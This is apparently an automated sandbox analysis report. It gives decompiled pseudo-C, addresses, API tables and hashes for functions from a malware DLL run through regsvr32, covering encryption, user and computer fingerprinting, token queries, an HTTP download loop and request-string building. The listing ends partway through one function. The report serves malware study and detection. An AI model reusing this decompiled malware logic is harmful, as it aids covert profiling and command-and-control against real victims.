0x1000230e
0x1000231a
0x10002322
0x10002329
0x1000232f
0x10002333
0x00000000
0x10002333
0x100022f6
0x100022f4
0x00000000
0x100022da
0x1000234e
0x1000234e
0x1000234e
0x100022ca
0x1000236a
0x10002371

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 77b6eedf273d64d7d9eb52fcb13e5ea4ca82e1d601bb1eeb606d553f1da290cf
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: D921B6769002059BDB14DF68CCC08ABFBA5FF48390B4681A9E9199B249DB34FA15C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 10001E62 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001E62(void* __ecx, WCHAR** _a4) {
				struct HINSTANCE__* _v8;
				long _v12;
				long _t10;
				long _t19;
				long _t20;
				WCHAR* _t23;

				_v8 =  *0x100041b0;
				_t19 = 0x104;
				_t23 = E10001911(0x208);
				if(_t23 == 0) {
					L8:
					_t20 = 8;
					L9:
					return _t20;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
					_v12 = _t10;
					if(_t10 == 0 || _t19 != _t10) {
						break;
					}
					_t19 = _t19 + 0x104;
					E100020CA(_t23);
					_t23 = E10001911(_t19 + _t19);
					if(_t23 != 0) {
						continue;
					}
					break;
				}
				_t20 = 0;
				if(_t23 == 0) {
					goto L8;
				}
				if(_v12 == 0) {
					_t20 = GetLastError();
					E100020CA(_t23);
				} else {
					 *_a4 = _t23;
				}
				goto L9;
			}

0x10001e73
0x10001e76
0x10001e80
0x10001e84
0x10001ed9
0x10001edb
0x10001edc
0x10001ee1
0x00000000
0x00000000
0x00000000
0x10001e86
0x10001e86
0x10001e8b
0x10001e91
0x10001e96
0x00000000
0x00000000
0x10001e9d
0x10001ea3
0x10001eb1
0x10001eb5
0x00000000
0x00000000
0x00000000
0x10001eb5
0x10001eb7
0x10001ebb
0x00000000
0x00000000
0x10001ec0
0x10001ed0
0x10001ed2
0x10001ec2
0x10001ec5
0x10001ec5
0x00000000

APIs

Part of subcall function 10001911: RtlAllocateHeap.NTDLL(00000000,?,10001027,00000030,747163F0,00000000), ref: 1000191D

GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,100010E3,?), ref: 10001E8B
GetLastError.KERNEL32(?,?,?,100010E3,?), ref: 10001EC9

Part of subcall function 100020CA: RtlFreeHeap.NTDLL(00000000,00000030,10001A8B,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,10001075), ref: 100020D6

Strings

@Mqt`fqt MqtTqt, xrefs: 10001EC9

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Heap$AllocateErrorFileFreeLastModuleName
String ID: @Mqt`fqt MqtTqt
API String ID: 845456116-883350353
Opcode ID: 73306211f55c9adb28a72f1c6ac8b3f379fae761ad7cbd03219957bf68ef1d1c
Instruction ID: 9ea2c1dd38e2480d29fa313c123f8fdcd435e980c6c16481adfb18b80fc8cb9b
Opcode Fuzzy Hash: 73306211f55c9adb28a72f1c6ac8b3f379fae761ad7cbd03219957bf68ef1d1c
Instruction Fuzzy Hash: 6801B176A01266BBF711CB6ADC849CF7AECDB857D0B210226FD4097249EA70DD4087A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 5216, Parent PID: 4124COMMON

Executed Functions

Function 02AF47E5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E02AF47E5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x2afa0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x2afa0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E02AF7A71(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x2afa0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x2afa0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E02AF789E(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x02af47ee
0x02af47f4
0x02af47f7
0x02af47fd
0x02af47fd
0x02af47ff
0x02af4801
0x02af4804
0x02af480a
0x02af480b
0x02af480c
0x02af4812
0x02af4817
0x02af481d
0x02af4825
0x02af4982
0x02af482b
0x02af482d
0x02af4836
0x02af483b
0x02af484d
0x02af4850
0x02af4854
0x02af485b
0x02af485f
0x02af4867
0x02af496d
0x02af486d
0x02af486d
0x02af4871
0x02af4872
0x02af4874
0x02af487f
0x02af4959
0x02af4885
0x02af4885
0x02af4888
0x02af488e
0x02af4894
0x02af4894
0x02af489c
0x02af489e
0x02af48a3
0x02af494a
0x02af48a9
0x02af48af
0x02af48b2
0x02af48b5
0x02af48b7
0x02af48b8
0x02af48bd
0x02af48bf
0x02af48bf
0x02af48c9
0x02af48ce
0x02af48d1
0x02af48d4
0x02af48d6
0x02af48df
0x02af4909
0x02af48e1
0x02af48f2
0x02af48f2
0x02af4911
0x00000000
0x00000000
0x02af4913
0x02af4916
0x02af4919
0x02af491d
0x00000000
0x02af491f
0x02af492e
0x02af4934
0x02af493c
0x02af493c
0x00000000
0x02af491d
0x02af4921
0x02af4927
0x02af492c
0x02af4943
0x00000000
0x00000000
0x00000000
0x02af492c
0x02af48a3
0x02af495c
0x02af495f
0x02af495f
0x02af4974
0x02af4974
0x02af498c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02AF44FD,00000001,02AF3831,00000000), ref: 02AF481D
memcpy.NTDLL(02AF44FD,02AF3831,00000010,?,?,?,02AF44FD,00000001,02AF3831,00000000,?,02AF22E5,00000000,02AF3831,?,775EC740), ref: 02AF4836
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02AF485F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02AF4877
memcpy.NTDLL(00000000,775EC740,04F89600,00000010), ref: 02AF48C9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,04F89600,00000020,?,?,00000010), ref: 02AF48F2
GetLastError.KERNEL32(?,?,00000010), ref: 02AF4921
GetLastError.KERNEL32 ref: 02AF4953
CryptDestroyKey.ADVAPI32(00000000), ref: 02AF495F
GetLastError.KERNEL32 ref: 02AF4967
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02AF4974
GetLastError.KERNEL32(?,?,?,02AF44FD,00000001,02AF3831,00000000,?,02AF22E5,00000000,02AF3831,?,775EC740,02AF3831,00000000,04F89600), ref: 02AF497C

Strings

@MqtNqt, xrefs: 02AF4921, 02AF4953, 02AF4967, 02AF497C

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID: @MqtNqt
API String ID: 3401600162-2883916605
Opcode ID: d06b002454bea4d2cb608565fe2e6f8b3dcc8ec6f10a4af66c7e31f2e0dc1201
Instruction ID: 7dbfe696aebb815b2bda5ce095813dfa653c4fbf7cc5c6a70bf9d7b68b164ebd
Opcode Fuzzy Hash: d06b002454bea4d2cb608565fe2e6f8b3dcc8ec6f10a4af66c7e31f2e0dc1201
Instruction Fuzzy Hash: 7E512A71A40249AFEB50DFE4DC84AAFBBB9FB08354F108425FB15E6240DB788A15DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02AF54EC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E02AF54EC(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2afa310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02AF3B9D( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2afa344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2afa2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02AF7194(_v8 + _v8, _t64);
							}
							HeapFree( *0x2afa2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2afa2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02AF7194(_v8 + _v8, _t64);
						}
						HeapFree( *0x2afa2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02af54ec
0x02af54f4
0x02af54f8
0x02af54fb
0x02af5500
0x02af5502
0x02af5507
0x02af5507
0x02af550d
0x02af550f
0x02af551c
0x02af557d
0x02af551e
0x02af5523
0x02af5529
0x02af552e
0x02af553c
0x02af5540
0x02af554f
0x02af5556
0x02af555d
0x02af555d
0x02af5568
0x02af5568
0x02af5540
0x02af552e
0x02af557f
0x02af5585
0x02af558f
0x02af5591
0x02af5596
0x02af55a5
0x02af55a9
0x02af55b4
0x02af55bb
0x02af55c2
0x02af55c2
0x02af55ce
0x02af55ce
0x02af55a9
0x02af55d9
0x02af55db
0x02af55de
0x02af55e0
0x02af55e3
0x02af55e6
0x02af55f0
0x02af55f4
0x02af55f8

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02AF5523
RtlAllocateHeap.NTDLL(00000000,?), ref: 02AF553A
GetUserNameW.ADVAPI32(00000000,?), ref: 02AF5547
HeapFree.KERNEL32(00000000,00000000), ref: 02AF5568
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02AF558F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02AF55A3
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02AF55B0
HeapFree.KERNEL32(00000000,00000000), ref: 02AF55CE

Strings

Uqt, xrefs: 02AF5568, 02AF55CE

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uqt
API String ID: 3239747167-2320327147
Opcode ID: 7119b7f8d5fb95d3528a11e0315d2d45137ec6603ae85ef1bdd37ddf78f9e789
Instruction ID: 71548547b858a6a502f11e12452bc4a5b08e974b5e0dda841fab44455ce22412
Opcode Fuzzy Hash: 7119b7f8d5fb95d3528a11e0315d2d45137ec6603ae85ef1bdd37ddf78f9e789
Instruction Fuzzy Hash: 54311872E40209AFD750DFE9DD80AAAB7FAAF48304F614469E605D7211EF38E9129B50

Uniqueness

Uniqueness Score: -1.00%

Function 02AF4F4B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E02AF4F4B(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x2afa174(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E02AF7A71(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E02AF2129( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E02AF789E(_v16);
										if(_t64 == 0) {
											_t64 = E02AF45DF(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E02AF2129( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E02AF4E4D(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x02af4f4b
0x02af4f4c
0x02af4f52
0x02af4f5d
0x02af4f5d
0x02af4f5f
0x02af7625
0x02af762a
0x02af762c
0x02af7643
0x02af7674
0x02af7679
0x02af773c
0x02af767f
0x02af7686
0x02af768e
0x02af7739
0x02af7694
0x02af7699
0x02af769e
0x02af76a3
0x02af772b
0x02af76a9
0x02af76a9
0x02af76ab
0x02af76b1
0x02af76b2
0x02af76b2
0x02af76b5
0x02af76b8
0x02af76be
0x02af76cf
0x02af76d7
0x00000000
0x00000000
0x02af76df
0x02af76e7
0x02af76f3
0x02af76f7
0x02af76f9
0x02af76fe
0x00000000
0x00000000
0x02af76fe
0x02af76f7
0x02af7710
0x02af7713
0x02af771a
0x02af7725
0x02af7725
0x00000000
0x02af7700
0x02af7700
0x02af7705
0x02af7707
0x02af7708
0x02af770b
0x00000000
0x02af770b
0x00000000
0x02af7705
0x02af76b2
0x02af772c
0x02af772c
0x02af7732
0x02af7732
0x02af768e
0x02af7645
0x02af764b
0x02af7653
0x02af766c
0x02af766e
0x00000000
0x00000000
0x02af7655
0x02af765f
0x02af7663
0x02af7669
0x00000000
0x02af7669
0x02af7663
0x02af7653
0x02af7745
0x02af4f54
0x02af4f54
0x02af4f5b
0x02af4f66
0x00000000
0x00000000
0x00000000
0x02af4f5b

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,747581D0,00000000,00000000), ref: 02AF762C
InternetReadFile.WININET(?,?,00000004,?), ref: 02AF763B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02AF3897,00000000,?,?), ref: 02AF7645
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02AF3897,00000000,?), ref: 02AF76BE
InternetReadFile.WININET(?,?,00001000,?), ref: 02AF76CF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02AF3897,00000000,?,?), ref: 02AF76D9

Part of subcall function 02AF4E4D: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 02AF4E64
Part of subcall function 02AF4E4D: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02AF3897,00000000,?), ref: 02AF4E74
Part of subcall function 02AF4E4D: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02AF4EA6
Part of subcall function 02AF4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02AF4ECB
Part of subcall function 02AF4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02AF4EEB

Strings

@MqtNqt, xrefs: 02AF7645, 02AF76D9

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
String ID: @MqtNqt
API String ID: 2393427839-2883916605
Opcode ID: d8801be74699653275d6182420406286447694b8940447cec06da9d1bc0ec284
Instruction ID: 817396f1b2a759ab246d1a11a81647186c8bfb99249d2952233701a1ce1853c1
Opcode Fuzzy Hash: d8801be74699653275d6182420406286447694b8940447cec06da9d1bc0ec284
Instruction Fuzzy Hash: 0341A736640604EBDBA19BE4DC84BAEF7B6AF88390F114924F715D7190EF74E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02AF737C Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E02AF737C(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02AF7A71(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02AF789E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02af7389
0x02af738a
0x02af738b
0x02af738c
0x02af738d
0x02af7391
0x02af7398
0x02af73a7
0x02af73aa
0x02af73ad
0x02af73b4
0x02af73b7
0x02af73ba
0x02af73bd
0x02af73c0
0x02af73cb
0x02af73cd
0x02af73d6
0x02af73de
0x02af73e0
0x02af73f2
0x02af73fc
0x02af7400
0x02af740f
0x02af7413
0x02af741c
0x02af7424
0x02af7424
0x02af7426
0x02af7426
0x02af742e
0x02af7434
0x02af7438
0x02af7438
0x02af7443

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02AF73C3
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02AF73D6
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02AF73F2

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02AF740F
memcpy.NTDLL(?,00000000,0000001C), ref: 02AF741C
NtClose.NTDLL(?), ref: 02AF742E
NtClose.NTDLL(00000000), ref: 02AF7438

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 7e488d7e89a4b48f3a702a74c9d7173bec9006e5eaae606a1f2e69878ffb1714
Instruction ID: 581e0c2e1a453738d455e75782ca979ba69b7753cacf08948d51e435bfdc4575
Opcode Fuzzy Hash: 7e488d7e89a4b48f3a702a74c9d7173bec9006e5eaae606a1f2e69878ffb1714
Instruction Fuzzy Hash: 77212472940219BBDB41EFE4CD84ADEBFBDEB08740F104062FA04A6110DB758A51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF3643 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 222
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E02AF3643(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x2afa3e0; // 0x4f89bc8
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x2afa2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x2afa018; // 0xe8f22e63
					asm("bswap eax");
					_t34 =  *0x2afa014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x2afa010; // 0xd8d2f808
					asm("bswap eax");
					_t36 = E02AFA00C; // 0x81762942
					asm("bswap eax");
					_t37 =  *0x2afa348; // 0x248d5a8
					_t3 = _t37 + 0x2afb62b; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d186, _t36, _t35, _t34, _t33,  *0x2afa02c,  *0x2afa004, _t112);
					_t40 = E02AF1308();
					_t41 =  *0x2afa348; // 0x248d5a8
					_t4 = _t41 + 0x2afb66b; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x2afa348; // 0x248d5a8
						_t8 = _t93 + 0x2afb676; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x2afa348; // 0x248d5a8
					_t10 = _t45 + 0x2afb2de; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E02AF3DE0(_t99); // executed
